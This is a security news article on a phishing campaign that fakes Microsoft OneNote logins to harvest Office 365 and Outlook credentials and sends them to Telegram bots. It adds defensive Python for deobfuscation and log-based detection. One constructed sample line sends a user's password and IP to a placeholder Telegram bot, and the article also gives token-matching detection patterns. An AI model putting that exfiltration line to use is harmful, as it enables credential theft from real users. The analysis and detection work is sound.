Hackers Imitate OneNote Login to Steal Office365 & Outlook Credentials
A sophisticated phishing campaign is targeting Italian and U.S. users with fake Microsoft OneNote login prompts designed to harvest Office 365 and Outlook credentials.
The attack hosts its pages on legitimate cloud services and exfiltrates stolen data through Telegram bots, which makes it considerably harder for traditional security controls to detect.
Phishing Campaign Targets Italian Users
The phishing operation begins with attackers hosting malicious pages on trusted platforms, including Notion workspaces, Glitch domains, Google Docs, and RenderForest services.
Victims receive emails with subject lines like “New Document Shared with you,” directing them to fake OneNote pages that appear legitimate.
The malicious pages present multiple authentication options, including Office365, Outlook, Rackspace, Aruba Mail, PEC, and other email services.
According to an ANY.RUN report, the campaign specifically targets Italian users and organizations: the phishing content is written in Italian and the subdomain names contain Italian words.
The attack has been active since at least January 2022 and has been refined repeatedly over that time.
The phishing pages use JavaScript to capture the submitted credentials together with the victim's IP address, which the script retrieves from the ipify.org service using the following code:
After the credentials are collected, the stolen data is exfiltrated via Telegram bots using a bot token and chat ID hardcoded directly in the phishing script. The exfiltration routine builds a request to the Telegram Bot API endpoint:
Researchers identified multiple bot configurations throughout the campaign’s timeline, including bots named “Sultanna” (@Sultannanewbot), “remaxx24” (@remaxx24bot), and “Resultant” (@Resultantnewbot).
Once the credentials have been captured, the page redirects the victim to the legitimate Microsoft OneNote login page, so the failed sign-in looks like an ordinary glitch and the theft goes unnoticed.
Evasion Techniques and Evolution
The campaign has changed considerably over its lifetime. Early variants relied on URL-encoding obfuscation and exfiltrated data through plain web form submissions.
Starting in February 2022, the attackers switched to Telegram bot-based exfiltration and wrapped the script in nested URL encoding (2 to 4 levels deep).
Between July and December 2024, the threat actors experimented with Base64 obfuscation but then abandoned it for unknown reasons.
The attackers never adopted more advanced evasion methods, which suggests either limited technical expertise or a focus on selling the harvested access rather than on developing payloads.
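The layered obfuscation described above is easy to peel off mechanically. The following is an added example, not ANY.RUN's or the campaign's own code: it strips nested URL-encoding and Base64 layers one at a time until the text stops changing, then pulls the hardcoded bot token and chat ID out of the decoded script. The script text, the bot token (`123456789:AAEexampleTOKENnotreal...`) and the chat ID are constructed placeholders in the right shape, not indicators from the report.

```python
"""Added example (not ANY.RUN's or the campaign's code): peel nested URL-encoding and
Base64 layers off a phishing script and extract its Telegram exfiltration endpoint.
The script text, bot token and chat ID used here are constructed placeholders."""
import base64
import binascii
import re
from urllib.parse import quote, unquote

# Telegram Bot API URL carrying a token (<numeric id>:<secret>) and a chat_id parameter.
TELEGRAM_EXFIL = re.compile(
    r"https?://api\.telegram\.org/bot(?P<token>\d{6,12}:[A-Za-z0-9_-]{30,50})"
    r"/sendMessage[^\s'\"]*?chat_id=(?P<chat_id>-?\d+)"
)

def _try_base64(text: str):
    """Return the decoded text if `text` is one complete, printable Base64 string, else None."""
    stripped = text.strip()
    if len(stripped) < 8 or len(stripped) % 4:
        return None
    try:
        decoded = base64.b64decode(stripped, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None
    if not all(ch.isprintable() or ch in "\r\n\t" for ch in decoded):
        return None
    return decoded

def peel_layers(blob: str, max_depth: int = 8):
    """Remove one encoding layer per iteration until nothing changes.
    Returns (plaintext, layers); layers lists the decoders applied, outermost first."""
    layers = []
    current = blob
    for _ in range(max_depth):
        decoded = unquote(current)              # exactly one level of %XX decoding
        if decoded != current:
            layers.append("urlencode")
            current = decoded
            continue
        decoded = _try_base64(current)
        if decoded is not None and decoded != current:
            layers.append("base64")
            current = decoded
            continue
        break
    return current, layers

def extract_exfil(script: str):
    """Pull the hardcoded bot token and chat ID out of a decoded phishing script."""
    m = TELEGRAM_EXFIL.search(script)
    return {"token": m.group("token"), "chat_id": m.group("chat_id")} if m else None

# Constructed stand-in for a decoded kit; the token and chat ID are not real.
INNER_SCRIPT = (
    "fetch('https://api.telegram.org/bot123456789:AAEexampleTOKENnotreal0123456789abcdefg"
    "/sendMessage?chat_id=-100987654321&text=' + encodeURIComponent(user + ':' + pass + ' ' + ip));"
)

def build_sample(script: str, url_layers: int = 3, base64_outer: bool = True) -> str:
    """Re-create the observed layering for testing: N levels of URL encoding, optionally in Base64."""
    blob = script
    for _ in range(url_layers):
        blob = quote(blob)                      # each pass turns '%' into '%25', adding a layer
    if base64_outer:
        blob = base64.b64encode(blob.encode()).decode()
    return blob

SAMPLE_BLOB = build_sample(INNER_SCRIPT)

if __name__ == "__main__":
    plain, layers = peel_layers(SAMPLE_BLOB)
    print("layers:", " -> ".join(layers))
    print("exfil :", extract_exfil(plain))
```

Each `unquote` call decodes exactly one `%XX` layer (`%2527` becomes `%27`, not `'`), which is what makes the layer count recoverable; the Base64 check is deliberately strict (valid alphabet, correct padding, printable result) so ordinary script text is never mistaken for an encoded layer.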
Security experts recommend monitoring network traffic for suspicious Telegram API communications, specifically requests to api.telegram.org that carry the identified bot tokens. Because the exfiltration request is issued by the phishing page's JavaScript, it originates from the victim's browser and therefore shows up in the organization's own proxy and DNS logs; note that the bot token sits in the HTTPS request path, so matching on it requires TLS inspection, whereas the api.telegram.org hostname alone is visible in DNS queries and TLS SNI.
Organizations should also look for the domain chain seen in this campaign, Notion → Glitch → Telegram API, within a single client's browsing session, and add signature-based rules that flag Telegram bot traffic with no business justification on the corporate network.
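The two recommendations above can be turned into a small detection that runs over proxy logs. The following is an added example, not ANY.RUN's or the campaign's own code: it flags every request to the Telegram Bot API (matching the token against a known-IOC list), and separately flags a client whose recent history shows a Notion → Glitch → Telegram API sequence inside a short window. The log format, host suffixes, client addresses, hostnames and both tokens are constructed assumptions; a real deployment would load the tokens published in the report and tune the window.

```python
"""Added example (not ANY.RUN's or the campaign's code): run the two detection ideas above over
constructed proxy log lines. Log format, hosts, addresses and tokens are all constructed."""
import re
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import urlsplit

# Bot API paths look like /bot<numeric id>:<secret>/<method>.
TELEGRAM_BOT_PATH = re.compile(r"^/bot(?P<token>\d{6,12}:[A-Za-z0-9_-]{30,50})/(?P<method>\w+)")

# Stage names and the host suffixes that count for each stage (assumed; extend from local sightings).
CHAIN_STAGES = (
    ("notion", ("notion.site", "notion.so")),
    ("glitch", ("glitch.me", "glitch.com")),
    ("telegram", ("api.telegram.org",)),
)
CHAIN_WINDOW = timedelta(minutes=10)

# Constructed IOC list; a real one would hold the tokens published in the report.
KNOWN_BAD_TOKENS = {"123456789:AAEexampleTOKENnotreal0123456789abcdefg"}

# Constructed proxy log, one request per line: "<timestamp> <client> <method> <url>".
# Paths are only visible with TLS inspection; without it, match on the hostname alone.
SAMPLE_LOG = """\
2025-05-20T09:14:03Z 10.0.0.5 GET https://login.microsoftonline.com/common/oauth2/authorize
2025-05-20T09:15:10Z 10.0.0.7 GET https://nuovo-documento.notion.site/Shared-Document
2025-05-20T09:15:22Z 10.0.0.7 GET https://accedi-onenote.glitch.me/index.html
2025-05-20T09:16:05Z 10.0.0.7 POST https://api.telegram.org/bot123456789:AAEexampleTOKENnotreal0123456789abcdefg/sendMessage
2025-05-20T09:30:00Z 10.0.0.9 GET https://api.telegram.org/bot555555555:AAFanotherConstructedTokenValue00000000/getUpdates
2025-05-20T10:02:41Z 10.0.0.5 GET https://www.onenote.com/
""".splitlines()

def stage_of(host: str):
    """Map a hostname to a chain stage name, or None if it belongs to no stage."""
    for name, suffixes in CHAIN_STAGES:
        if any(host == s or host.endswith("." + s) for s in suffixes):
            return name
    return None

def _chain_completed(history, now):
    """Walk one client's stage history backwards from `now`; True if notion, glitch and
    telegram all occurred in that order inside CHAIN_WINDOW."""
    want = [name for name, _ in CHAIN_STAGES]
    idx = len(want) - 1
    for ts, stage in reversed(history):
        if now - ts > CHAIN_WINDOW:
            break
        if stage == want[idx]:
            idx -= 1
            if idx < 0:
                return True
    return False

def detect(lines):
    """Return a list of alert dicts for the given log lines."""
    alerts = []
    history = defaultdict(list)                 # client -> [(timestamp, stage)]
    for line in lines:
        ts_raw, client, method, url = line.split(maxsplit=3)
        ts = datetime.strptime(ts_raw, "%Y-%m-%dT%H:%M:%SZ")
        parts = urlsplit(url)
        host = (parts.hostname or "").lower()
        if host == "api.telegram.org":
            m = TELEGRAM_BOT_PATH.match(parts.path)
            if m:
                token = m.group("token")
                alerts.append({
                    "rule": "telegram_bot_request", "client": client,
                    "token": token, "api_method": m.group("method"),
                    "severity": "known_ioc" if token in KNOWN_BAD_TOKENS else "unknown_bot",
                })
        stage = stage_of(host)
        if stage:
            history[client].append((ts, stage))
            if stage == "telegram" and _chain_completed(history[client], ts):
                alerts.append({"rule": "phishing_chain", "client": client,
                               "path": " -> ".join(s for _, s in history[client])})
    return alerts

if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(alert)
```

The token rule fires on any Bot API request, not only on known tokens, because a previously unseen token from a workstation is still worth a look; the severity field separates the two cases. The chain rule keys on the host sequence rather than on specific domains, so newly registered Notion or Glitch subdomains are caught without a signature update.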
The campaign’s targeting of PEC (Posta Elettronica Certificata), Italy’s national certified email system, indicates potential objectives extending beyond simple credential theft to business email compromise and access brokering within cybercriminal ecosystems.